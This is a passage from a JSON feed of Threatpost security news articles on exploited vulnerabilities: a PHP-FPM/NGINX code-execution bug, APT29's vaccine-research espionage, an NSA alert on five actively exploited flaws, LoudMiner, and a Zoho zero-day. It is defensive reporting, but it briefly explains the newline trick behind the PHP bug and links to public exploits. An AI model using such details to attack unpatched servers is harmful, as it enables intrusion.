patched](<https://bugs.php.net/patch-display.php?bug_id=78599&patch=0001-Fix-bug-78599-env_path_info-underflow-can-lead-to-RC.patch&revision=latest>) in PHP versions 7.3.11, 7.2.24 and 7.1.33, which were released last week.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nIn a [Monday posting](<https://github.com/search?q=fastcgi_split_path&type=Code>), Wallarm researchers said that the bug can be exploited by sending specially crafted packets to the server by using the \u201cfastcgi_split_path\u201d directive in the NGINX configuration file. That file is configured to process user data, such as a URL. If an attacker creates a special URL that includes a \u201c%0a\u201d (newline) byte, the server will send back more data than it should, which confuses the FastCGI mechanism.\n\n\u201cIn particular, [the bug can be exploited] in a fastcgi_split_path directive and a regexp trick with newlines,\u201d according to Wallarm security researcher Andrew Danau, who found the bug. \u201cBecause of %0a character, NGINX will set an empty value to this variable, and fastcgi+PHP will not expect this\u2026.[as a result], it\u2019s possible to put [in] arbitrary FastCGI variables, like PHP_VALUE.\u201d\n\nAnother security researcher participating in the CTF exercise, Emil Lerner, offered more details in the [PHP bug tracker](<https://bugs.php.net/bug.php?id=78599>): \u201cThe regexp in `fastcgi_split_path_info` directive can be broken using the newline character (in encoded form, %0a). Broken regexp leads to empty PATH_INFO, which triggers the bug,\u201d he said.\n\nLerner [posted a zero-day proof-of-concept](<https://github.com/neex/phuip-fpizdam/>) exploit for the flaw that works in PHP 7 to allow code execution. The exploit makes use of an optimization used for storing FastCGI variables, _fcgi_data_seg.\n\n\u201cUsually, that sort of [buffer underflow] response is related to memory-corruption attacks and we expected to see an attack on the type of information disclosure,\u201d Wallarm researchers said. \u201cInformation disclosure is bad enough as it can result in leaking sensitive or financial data. Even worse, from time to time, although quite rarely, such behavior can indicate a remote code-execution vulnerability.\u201d\n\nResearchers added that without patching, this issue can be a dangerous entry point into web applications given the trivial nature of mounting an exploit.\n\nAdmins can identify vulnerable FastCGI directives in their NGINX configurations with a bash command, \u201cegrep -Rin \u2013color \u2018fastcgi_split_path\u2019 /etc/nginx/,\u201d according to Wallarm.\n\n_**What are the top mistakes leading to data breaches at modern enterprises? Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-28T16:18:11", "type": "threatpost", "title": "PHP Bug Allows Remote Code-Execution on NGINX Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11043", "CVE-2020-0688", "CVE-2020-1472"], "modified": "2019-10-28T16:18:11", "id": "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "href": "https://threatpost.com/php-bug-rce-nginx-servers/149593/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-16T19:56:37", "description": "The advanced threat actor known as APT29 has been hard at work attempting to pilfer COVID-19 vaccine research from academic and pharmaceutical research institutions in various countries around the world, including the U.S.\n\nThat\u2019s according to a joint alert from the U.S. Department of Homeland Security (DHS), the U.K.\u2019s National Cyber Security Centre (NCSC) and Canada\u2019s Communications Security Establishment (CSE), [issued Thursday](<https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development>).\n\nThe 14-page advisory details the recent activity of Russia-linked APT29 (a.k.a. CozyBear or the Dukes), including the use of custom malware called \u201cWellMess\u201d and \u201cWellMail\u201d for data exfiltration.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThroughout 2020, APT29 has targeted various organizations involved in COVID-19 vaccine development in Canada, the United States and the United Kingdom, highly likely with the intention of stealing information and intellectual property relating to the development and testing of COVID-19 vaccines,\u201d the report noted.\n\nThis specific activity was seen starting in April, but security researchers noted that nation-state espionage targeted to coronavirus treatments and cures [has been a phenomenon all year](<https://threatpost.com/nation-backed-apts-covid-19-spy-attacks/155082/>).\n\n\u201cCOVID-19 is an existential threat to every government in the world, so it\u2019s no surprise that cyber-espionage capabilities are being used to gather intelligence on a cure,\u201d said John Hultquist, senior director of analysis at Mandiant Threat Intelligence, via email. \u201cThe organizations developing vaccines and treatments for the virus are being heavily targeted by Russian, Iranian and Chinese actors seeking a leg up on their own research. We\u2019ve also seen significant COVID-related targeting of governments that began as early as January.\u201d\n\n## **Exploits in Play**\n\nTo mount the attacks, APT29 is using exploits for known vulnerabilities to gain initial access to targets, according to the analysis, along with spearphishing to obtain authentication credentials to internet-accessible login pages for target organizations. The exploits in rotation include the recent [Citrix code-injection bug](<https://threatpost.com/citrix-bugs-allow-unauthenticated-code-injection-data-theft/157214/>) (CVE-2019-19781); a publicized [Pulse Secure VPN flaw](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) (CVE-2019-11510); and issues in FortiGate (CVE-2018-13379) and Zimbra (CVE-2019-9670).\n\n\u201cThe group conducted basic vulnerability scanning against specific external IP addresses owned by the [targeted] organizations,\u201d according to the report. \u201cThe group then deployed public exploits against the vulnerable services identified. The group has been successful using recently published exploits to gain initial footholds.\u201d\n\nOnce a system is compromised, the group then looks to obtain additional authentication credentials to allow further access and spread laterally.\n\n## **Custom Malware**\n\nOnce established in a network, APT29 is employing homegrown malware that the NCSC is calling WellMess and WellMail, to conduct further operations on the victim\u2019s system and exfiltrate data.\n\nWellMess, first discovered in July 2018, is malware that comes in Golang or .NET versions and supports HTTP, TLS and DNS for communications.\n\nNamed after one of the function names in the malware, \u201cWellMess is a lightweight malware designed to execute arbitrary shell commands, upload and download files,\u201d according to the advisory.\n\nWellMail malware meanwhile, named after file paths containing the word \u2018mail\u2019 and the use of server port 25, is also lightweight \u2013 and is designed to run commands or scripts while communicating with a hardcoded command-and-control (C2) server.\n\n\u201cThe binary is an ELF utility written in Golang which receives a command or script to be run through the Linux shell,\u201d according to the NCSC. \u201cTo our knowledge, WellMail has not been previously named in the public domain.\u201d\n\nBoth malwares uses hard-coded client and certificate authority TLS certificates to communicate with their C2 servers.\n\n\u201cWellMess and WellMail samples contained TLS certificates with the hard-coded subjectKeyIdentifier (SKI) \u20180102030406\u2019, and used the subjects \u2018C=Tunis, O=IT\u2019 and \u2018O=GMO GlobalSign, Inc\u2019 respectively,\u201d detailed the report. \u201cThese certificates can be used to identify further malware samples and infrastructure. Servers with this GlobalSign certificate subject may be used for other functions in addition to WellMail malware communications.\u201d\n\nAPT29 is also using another malware, dubbed \u2018SoreFang\u2019 by the NCSC, which is a first-stage downloader that uses HTTP to exfiltrate victim information and download second-stage malware. It\u2019s using the same C2 infrastructure as a WellMess sample, the agencies concluded.\n\nThis sample is not a custom job: \u201cIt is likely that SoreFang targets SangFor devices. Industry reporting indicates that other actors, reportedly including [DarkHotel](<https://threatpost.com/microsoft-zero-day-actively-exploited-patch/152018/>), have also targeted SangFor devices,\u201d noted the NCSC.\n\n## **APT29: A Sporadically High-Profile Threat**\n\n[APT29](<https://attack.mitre.org/groups/G0016/>) has long been seen targeting high-value targets across the think-tank, law enforcement, media, U.S. military, imagery, transportation, pharmaceutical, national government and defense contracting sectors.\n\nThe group is is perhaps best-known for the [intrusion](<https://threatpost.com/dnc-hacked-research-on-trump-stolen/118656/>) at the Democratic National Committee ahead of the U.S. presidential election in 2016. It was also implicated in [a widespread phishing campaign](<https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/>) in November 2016, in attacks against the White House, State Department and Joint Chiefs of Staff.\n\nIt was next seen in November 2017 [executing a Tor backdoor](<https://threatpost.com/apt29-used-domain-fronting-tor-to-execute-backdoor/124582/>), and then [it reemerged](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) in 2018 with a widespread espionage campaign against military, media and public-sector targets.\n\nIts history stretches back a few years though: It [was also seen](<https://threatpost.com/white-house-state-department-counted-among-cozyduke-apt-victims/112382/>) by Kaspersky Lab carrying out data-mining attacks against the White House and the Department of State in 2014.\n\nResearchers from firms [like Mandiant](<https://www.fireeye.com/current-threats/apt-groups/rpt-apt29.html>) believe APT29 to be linked to Russian government-backed operations \u2013 an assessment that the DHS and NCSC reiterated in the latest advisory, saying that it is \u201calmost certainly part of the Russian intelligence services.\u201d\n\nWhile its publicly profiled activity tends to be sporadic, APT29 is rarely at rest, according to Mandiant\u2019s Hultquist.\n\n\u201cDespite involvement in several high-profile incidents, APT29 rarely receives the same attention as other Russian actors because they tend to quietly focus on intelligence collection,\u201d he said via email. \u201cWhereas GRU actors have brazenly leaked documents and carried out destructive attacks, APT29 digs in for the long term, siphoning intelligence away from its target.\u201d\n\nThis latest case is no exception to that M.O., according to the advisory: \u201cAPT29 is likely to continue to target organizations involved in COVID-19 vaccine research and development, as they seek to answer additional intelligence questions relating to the pandemic,\u201d the agencies concluded.\n\nThat said, at least one researcher warned that the end-game of the activity might be more nefarious than simply getting a leg up on a cure.\n\n\u201cAPT29 (Cozy Bear, Office Monkeys) has successfully demonstrated the extension of nation-state power through cyber-action for more than a dozen years,\u201d Michael Daly, CTO at Raytheon Intelligence & Space, said via email. \u201cHowever, they are not focused on simple intellectual property theft. Instead, their focus is rooted in influence operations \u2013 the changing of hearts and minds to thwart and diminish the power of governments and organizations.\u201d\n\nHe added, \u201cIn the case of this breach of vaccine research centers, we should be most concerned not that someone else might also get a vaccine, but that the information will be used to undermine the confidence of the public in the safety or efficacy of the vaccines, slowing their adoption, or in some way cause their release to be delayed. The effect of such a delay would be both impactful to the health of Western populations, but also to the social stability and economic stability of the West.\u201d\n", "cvss3": {}, "published": "2020-07-16T18:05:20", "type": "threatpost", "title": "Hackers Look to Steal COVID-19 Vaccine Research", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670"], "modified": "2020-07-16T18:05:20", "id": "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "href": "https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-16T18:13:10", "description": "The Feds are warning that nation-state actors are once again after U.S. assets, this time in a spate of cyberattacks that exploit five vulnerabilities that affect VPN solutions, collaboration-suite software and virtualization technologies.\n\nAccording to the U.S. National Security Agency (NSA), which issued [an alert Thursday,](<https://www.nsa.gov/News-Features/Feature-Stories/Article-View/Article/2573391/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabili/%20/#pop5008885>) the advanced persistent threat (APT) group [known as APT29](<https://threatpost.com/state-sponsored-hackers-steal-covid-19-vaccine-research/157514/>) (a.k.a. Cozy Bear or The Dukes) is conducting \u201cwidespread scanning and exploitation against vulnerable systems in an effort to obtain authentication credentials to allow further access.\u201d\n\nThe targets include U.S. and allied national-security and government networks, it added.\n\n[](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)\n\nJoin experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) to find out how cybercrime forums really work. FREE! Register by clicking above.\n\nThe five bugs under active attack are known, fixed security holes in platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware (detailed below) that organizations should patch immediately, researchers warned.\n\n\u201cSome of these vulnerabilities also have working Metasploit modules and are currently being widely exploited,\u201d said researchers with Cisco Talos, in a [related posting](<https://blog.talosintelligence.com/2021/04/nsa-svr-coverage.html#more>) on Thursday. \u201cPlease note that some of these vulnerabilities exploit applications leveraging SSL. This means that users should enable SSL decryption\u2026to detect exploitation of these vulnerabilities.\u201d\n\nThe NSA has linked APT29 to Russia\u2019s Foreign Intelligence Services (SVR). The news comes as the U.S. formally attributed the recent [SolarWinds supply-chain attack](<https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/>) to the SVR and issued sanctions on Russia for cyberattacks and what President Biden called out as interference with U.S. elections.\n\n## **The 5 Vulnerabilities Being Actively Exploited**\n\nAccording to the NSA, the following are under widespread attack in cyber-espionage efforts:\n\n * CVE-2018-13379 Fortinet FortiGate SSL VPN (path traversal)\n * CVE-2019-9670 Synacor Zimbra Collaboration Suite (XXE)\n * CVE-2019-11510 Pulse Secure Pulse Connect Secure VPN (arbitrary file read)\n * CVE-2019-19781 Citrix Application Delivery Controller and Gateway (directory traversal)\n * CVE-2020-4006 VMware Workspace ONE Access (command injection)\n\n\u201cVulnerabilities in two VPN systems, two virtualization platforms and one collaboration solution seem to be a mighty combo,\u201d Dirk Schrader, global vice president of security research at New Net Technologies, told Threatpost. \u201cFour of them are 12 months or older, which is not a good sign for the overall cyber-hygiene in the U.S., given that all are either rated as severe or even critical in NIST\u2019s NVD. It looks like that adversaries can rely on the lack of diligence related to essential cybersecurity control, even more so in pandemic times.\u201d\n\n## **CVE-2018-13379**\n\nA directory traversal vulnerability in Fortinet FortOS allows unauthenticated attackers to access and download system files, by sending specially crafted HTTP resource requests. \u201cThis can result in the attacker obtaining VPN credentials, which could allow an initial foothold into a target network,\u201d according to Cisco Talos.\n\nThe NSA explained that it arises from an improper limitation of a pathname to a restricted directory. It affects Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12.\n\nThe nation-state issue is ongoing: Earlier in April, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>) APTs were actively exploiting the bug.\n\n## **CVE-2019-9670**\n\nThis bug is an XML External Entity Injection (XXE) vulnerability in the mailbox component of the Synacore Zimbra Collaboration Suite. Attackers can exploit it to gain access to credentials to further their access or as an initial foothold into a target network. It affects Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10.\n\n## **CVE-2019-11510**\n\nIn Pulse Secure VPNs, a critical arbitrary file-reading flaw opens systems to exploitation from remote, unauthenticated attackers looking to gain access to a victim\u2019s networks. Attacker can send a specially crafted URI to trigger the exploit. It affects Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4.\n\n\u201cThis can be abused by attackers to access sensitive information, including private keys and credentials,\u201d explained Cisco Talos researchers.\n\nLast April, the Department of Homeland Security (DHS) began urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN family.\n\nAt the time, DHS [warned that attackers](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) who have already exploited the flaw to snatch up victims\u2019 credentials were using those credentials to move laterally through organizations, rendering patches useless.\n\nThen September, a successful cyberattack on an unnamed federal agency [was attributed to](<https://threatpost.com/feds-cyberattack-data-stolen/159541/>) exploitation of the bug. \u201cIt is possible the cyber-actor obtained the credentials from an unpatched agency VPN server by exploiting a known vulnerability \u2013 CVE-2019-11510 \u2013 in Pulse Secure,\u201d according to CISA\u2019s alert at the time. \u201cCVE-2019-11510\u2026allows the remote, unauthenticated retrieval of files, including passwords. CISA has observed wide exploitation of CVE-2019-11510 across the federal government.\u201d\n\n## **CVE-2019-19781**\n\nThis critical directory-traversal vulnerability in the Citrix Application Delivery Controller (ADC) and Gateway that can allow remote code-execution. It was first disclosed as a zero-day in December 2019, after which Citrix [rolled out patches](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) amidst dozens of proof-of-concept exploits and skyrocketing exploitation attempts.\n\nIt affects Citrix ADC and Gateway versions before 13.0.47.24, 12.1.55.18, 12.0.63.13, 11.1.63.15 and 10.5.70.12 and SD-WAN WANOP 4000-WO, 4100-WO, 5000-WO, and 5100-WO versions before 10.2.6b and 11.0.3b.\n\n## **C****VE-2020-4006**\n\nAnd finally, a command-injection vulnerability in VMWare Workspace One Access, Access Connector, Identity Manager and Identity Manager Connector allows arbitrary command execution on underlying operating systems. A successful exploit does, however, require valid credentials to the configurator admin account, so it must be chained with another bug to use it.\n\nNonetheless, in December the NSA [warned that](<https://threatpost.com/nsa-vmware-bug-under-attack/161985/>) foreign adversaries were zeroing in on exploiting the flaw, despite patches rolling out just days earlier. State actors were using the bug to pilfer protected data and abuse shared authentication systems, it said.\n\nIt affects VMware One Access 20.01 and 20.10 on Linux, VMware Identity Manager 3.3.1 \u2013 3.3.3 on Linux, VMware Identity Manager Connector 3.3.1 \u2013 3.3.3 and 19.03, VMware Cloud Foundation 4.0 \u2013 4.1, and VMware Vrealize Suite Lifecycle Manager 8.x.\n\n## **How Can I Protect Against Cyberattacks?**\n\nThe NSA recommended several best practices to protect organizations from attack:\n\n * Update systems and products as soon as possible after patches are released.\n * Assume a breach will happen; review accounts and leverage the latest eviction guidance available.\n * Disable external management capabilities and set up an out-of-band management network.\n * Block obsolete or unused protocols at the network edge and disable them in client device configurations.\n * Adopt a mindset that compromise happens: Prepare for incident response activities.\n\n\u201cIf publicly known, patchable exploits still have gas in the tank, this is just an indictment against the status-quo disconnect between many organizations\u2019 understanding of risk and basic IT hygiene,\u201d Tim Wade, technical director on the CTO team at Vectra, told Threatpost. \u201cThe unfortunate reality is that for many organizations, the barrier to entry into their network continues to be low-hanging fruit which, for one reason or another, is difficult for organizations to fully manage.\u201d\n\nHe added, \u201cThis underscores why security leaders should assume that for all the best intentions of their technology peers, compromises will occur \u2013 their imperative is to detect, respond and recover from those events to expel adversaries before material damage is realized.\u201d\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _**[**_FREE Threatpost event_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _**[**_Register here_**](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)**_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-16T18:10:09", "type": "threatpost", "title": "NSA: 5 Security Bugs Under Active Nation-State Cyberattack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2019-9670", "CVE-2020-4006"], "modified": "2021-04-16T18:10:09", "id": "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "href": "https://threatpost.com/nsa-security-bugs-active-nation-state-cyberattack/165446/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-05-07T21:56:19", "description": "An unusual cryptocurrency miner, dubbed LoudMiner, is spreading via pirated copies of Virtual Studio Technology. It uses virtualization software to mine Monero on a Tiny Core Linux virtual machine \u2013 a unique approach, according to researchers.\n\nVirtual Studio Technology (VST) is an audio plug-in software interface that integrates software synthesizers and effects in digital audio workstations. The idea is to simulate traditional recording studio functions. ESET analysts recently uncovered a WordPress-based website hawking trojanized packages that incorporate the popular software, including Propellerhead Reason, Ableton Live, Reaktor 6, AutoTune and others. In all, there are 137 VST-related applications (42 for Windows and 95 for macOS) available for download on the site.\n\nUpon downloading, an unwitting audiophile\u2019s computer would be infVirtual Studio Technology (VST)ected with LoudMiner, which consists of the VST application bundled with virtualization software, a Linux image and additional files used to achieve persistence. It uses the XMRig cryptominer hosted on a virtual machine. So far, three Mac versions and one Windows variant of the malware have been uncovered.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cRegarding the nature of the applications targeted, it is interesting to observe that their purpose is related to audio production,\u201d wrote Michal Malik, researcher at ESET, [in a posting](<https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/>) on Thursday. \u201cThus, the machines that they are installed on should have good processing power and high CPU consumption will not surprise the users.\u201d\n\nBecause the victim would also get a functioning version of the application that they expected, the attackers gain some air cover.\n\n\u201cThese applications are usually complex, so it is not unexpected for them to be huge files,\u201d Malik explained. \u201cThe attackers use this to their advantage to camouflage their virtual machine (VM) images.\u201d\n\nDespite the efforts at camouflage, victims quickly become aware that something\u2019s amiss, thanks to system slowdowns, according to [forum postings](<https://discussions.apple.com/thread/8602989>).\n\n\u201cUnfortunately, had to reinstall OSX, the problem was that Ableton Live 10, which I have downloaded it from a torrent site and not from the official site, installs a miner too, running at the background causing this,\u201d said a user named \u201cMacloni.\u201d\n\n\u201cThe same user attached screenshots of the Activity Monitor indicating 2 processes \u2013 qemu-system-x86_64 and tools-service \u2013 taking 25 percent of CPU resources and running as root,\u201d said Malik, adding that some users found a full 100 percent of their CPU capacity hijacked.\n\n## Using a Virtual Machine\n\nLoudMiner uses QEMU on macOS and VirtualBox on Windows to connect to a Linux image running on a VM \u2013 more specifically, it\u2019s a Tiny Core Linux 9.0 image configured to run XMRig. The victim\u2019s machine is added to a mining pool that the Linux image uses for CPU power.\n\nMalik noted that that the decision by the malware authors to use VMs for performing the mining instead of hosting it locally on the victim\u2019s computer is \u201cquite remarkable and this is not something we routinely see\u201d \u2013 although it\u2019s not unheard of for legitimate miners to [deploy the strategy](<https://medium.com/@Jayvdb/how-to-start-mining-cryptocurrency-for-fun-and-possibly-profit-71517859ed91>) to save money.\n\n\u201cUser downloads the application and follows attached instructions on how to install it. LoudMiner is installed first, the actual VST software after,\u201d he explained. \u201cLoudMiner hides itself and becomes persistent on reboot. The Linux virtual machine is launched and [the mining starts](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>). Scripts inside the virtual machine can contact the C2 server to update the miner.\u201d\n\nHe said that in order to identify a particular mining session, a file containing the IP address of the machine and the day\u2019s date is created by the \u201cidgenerator\u201d script and its output is sent to the C2 server by the \u201cupdater.sh script.\u201d\n\nBecause LoudMiner uses a mining pool, it\u2019s impossible to retrace potential transactions to find out how successful the adversaries have been thus far, he added.\n\nTo avoid the threat, age-old advice applies: Don\u2019t download pirated copies of commercial software. Malik also offered some hints to identify when an application contains unwanted code. Red flags include a trust popup from an unexpected, \u201cadditional\u201d installer; high CPU consumption by a process one did not install (QEMU or VirtualBox in this case); a new service added to the startup services list; and network connections to curious domain names (such as system-update[.]info or system-check[.]services).\n", "cvss3": {}, "published": "2019-06-20T19:53:23", "type": "threatpost", "title": "LoudMiner Cryptominer Uses Linux Image and Virtual Machines", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-18935"], "modified": "2019-06-20T19:53:23", "id": "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "href": "https://threatpost.com/loudminer-cryptominer-linux/145871/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-10T12:44:24", "description": "UPDATE\n\nA zero-day vulnerability has been disclosed in the IT help desk ManageEngine software made by Zoho Corp. The serious vulnerability enables an unauthenticated, remote attacker to launch attacks on affected systems. Zoho has now [released a security update](<https://www.us-cert.gov/ncas/current-activity/2020/03/06/zoho-releases-security-update-manageengine-desktop-central>) addressing the vulnerability.\n\nAs of Monday, March 9, the vulnerability has been observed being actively exploited in the wild, according to a [Center for Internet Security advisory](<https://www.cisecurity.org/advisory/a-vulnerability-in-manageengine-desktop-central-could-allow-for-remote-code-execution_2020-033/>).\n\nThe vulnerability, [first reported by ZDNet](<https://www.zdnet.com/article/zoho-zero-day-published-on-twitter/#ftag=RSSbaffb68>), exists in Zoho ManageEngine Desktop Central, an endpoint management tool to help users manage their servers, laptops, smartphones, and more from a central location. Steven Seeley of Source Incite, [disclosed the flaw](<https://srcincite.io/advisories/src-2020-0011/>) on Twitter, Thursday, along with a proof of concept (PoC) exploit. According to ZDNet, the enterprise software development company will release a patch for the flaw on Friday.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis vulnerability allows remote attackers to execute arbitrary code on affected installations of ManageEngine Desktop Central. Authentication is not required to exploit this vulnerability,\u201d according to Seeley.\n\nAccording to Seeley, the specific flaw exists within the FileStorage class of the Desktop Central. The FileStorage class is used to store data for reading data to or from a file. The issue results from improper validation of user-supplied data, which can result in deserialization of untrusted data.\n\nSeeley told Threatpost, attacker can leverage this vulnerability to execute code under the context of SYSTEM, giving them \u201cfull control of the target machine\u2026 basically the worst it gets.\u201d\n\n> Since [@zoho](<https://twitter.com/zoho?ref_src=twsrc%5Etfw>) typically ignores researchers, I figured it was OK to share a ManageEngine Desktop Central zero-day exploit with everyone. UnCVE'ed, unpatched and unauthenticated RCE as SYSTEM/root. Enjoy!\n> \n> Advisory: <https://t.co/U9LZPp4l5o> \nExploit: <https://t.co/LtR75bhooy>\n> \n> \u2014 \u03fb\u0433_\u03fb\u03b5 (@steventseeley) [March 5, 2020](<https://twitter.com/steventseeley/status/1235635108498948096?ref_src=twsrc%5Etfw>)\n\nAccording to Seeley, who also posted a [PoC attack for the flaw on Twitter](<https://srcincite.io/pocs/src-2020-0011.py.txt>), the vulnerability ranks 9.8 out of 10.0 on the CVSS scale, making it critical in severity. Nate Warfield, a security researcher with Microsoft, pointed to[ at least 2,300](<https://twitter.com/n0x08/status/1235637306838532096>) Zoho systems potentially exposed online.\n\nRick Holland, CISO and vice president of strategy at Digital Shadows, said if an attacker can compromise a solution like ManageEngine, they have an \u201copen season\u201d on a target company\u2019s environment.\n\n\u201cAn attacker has a myriad of options not limited to: accelerating reconnaissance of the target environment, deploying their malware including ransomware, or even remotely monitor users\u2019 machines,\u201d Holland told Threatpost. \u201cGiven that this vulnerability enables unauthenticated remote execution of code, it is even more vital that companies deploy a patch as soon as it becomes available. Internet-facing deployments of Desktop Central should be taken offline immediately.\u201d\n\nThreatpost has reached out to Zoho via email and Twitter for further comment; the company has not yet responded. However Zoho said on Twitter, \u201cwe have identified the issue and are working on a patch with top priority. We will update once it is done.\u201d\n\n> We have identified the issue and are working on a patch with top priority. We will update once it is done. ^BG\n> \n> \u2014 Zoho (@zoho) [March 6, 2020](<https://twitter.com/zoho/status/1235811733194682368?ref_src=twsrc%5Etfw>)\n\nSeeley told Threatpost that he didn\u2019t contact Zoho before disclosing the vulnerability due to negative previous experiences with the company regarding vulnerability disclosure. \u201cI have in the past for other critical vulnerabilities and they ignored me,\u201d he said.\n\nThis lack of responsible disclosure has drawn mixed opinions from security experts. Some, like Rui Lopes, engineering and technical support director at Panda Security, told Threatpost that the incident could leave vulnerable systems open to bad actors.\n\n\u201cThere seems to be some breakdown of communication between independent researchers and the solution vendors who offer centralized IT management platforms, which inevitably leads to inefficient patching protocols and the exposure of sensitive information that arms bad actors with threat vectors that would be otherwise unknown.\u201d\n\nTim Wade, technical director of the CTO Team at Vectra, told Threatpost that the incident highlights the need for better relationships between security researchers and organizations.\n\n\u201cAllegedly, Zoho\u2019s reputation for ignoring security researchers who\u2019ve found exploitable bugs in their products factored into the decision for a direct release,\u201d he said. \u201cWhile the merits of this decision may be discussed fairly from multiple perspectives, at a minimum it underscores the need for software organizations to foster better relationships with the security community, and the seriousness of failing to do so.\u201d\n\nResearchers previously found multiple critical flaws in 2018 in Zoho\u2019s [ManageEngine software](<https://threatpost.com/multiple-critical-flaws-found-in-zohos-manageengine/129709/>). In all, seven vulnerabilities were discovered, each allowing an attacker to ultimately take control of host servers running ManageEngine\u2019s SaaS suite of applications. Also previously a massive number of [keylogger phishing campaigns](<https://threatpost.com/keyloggers-turn-to-zoho-office-suite-in-droves-for-data-exfiltration/137868/>) were seen tied to the Zoho online office suite software; in an analysis, a full 40 percent spotted in October 2018 used a zoho.com or zoho.eu email address to exfiltrate data from victim machines.\n\n_This article was updated Friday at 4:36 pm to reflect that Zoho has released a patch; and on Monday at 4pm to reflect that the flaw is now being actively exploited in the wild._\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-06T16:53:00", "type": "threatpost", "title": "Critical Zoho Zero-Day Flaw Disclosed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-06T16:53:00", "id": "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "href": "https://threatpost.com/critical-zoho-zero-day-flaw-disclosed/153484/?utm_source=rss&utm_medium=rss&utm_campaign=critical-zoho-zero-day-flaw-disclosed", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-06T22:07:10", "description": "Microsoft is warning customers that some Azure installations are vulnerable to a recently-disclosed critical Linux Exim mail server flaw that is under active attack.\n\nThe warning comes after a widespread worm campaign was [disclosed on Friday](<https://threatpost.com/linux-servers-worm-exim-flaw/145698/>), targeting a flaw in the Exim mail transport agent (MTA), which are Linux-based mail servers that receive, route and deliver email messages from local users and remote hosts. However, the issue also plagues Azure users: Linux virtual machines, which run Exim servers, can be created through the Azure portal (a browser-based user interface to create VMs and their associated resources).\n\nIn an advisory, Microsoft said that Azure customers using the vulnerable software (Azure customers running virtual machines that use Exim version 4.87 to 4.91) are susceptible to the attack. Exim version 4.92 is not vulnerable.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cCustomers using Azure virtual machines (VMs) are responsible for updating the operating systems running on their VMs,\u201d said JR 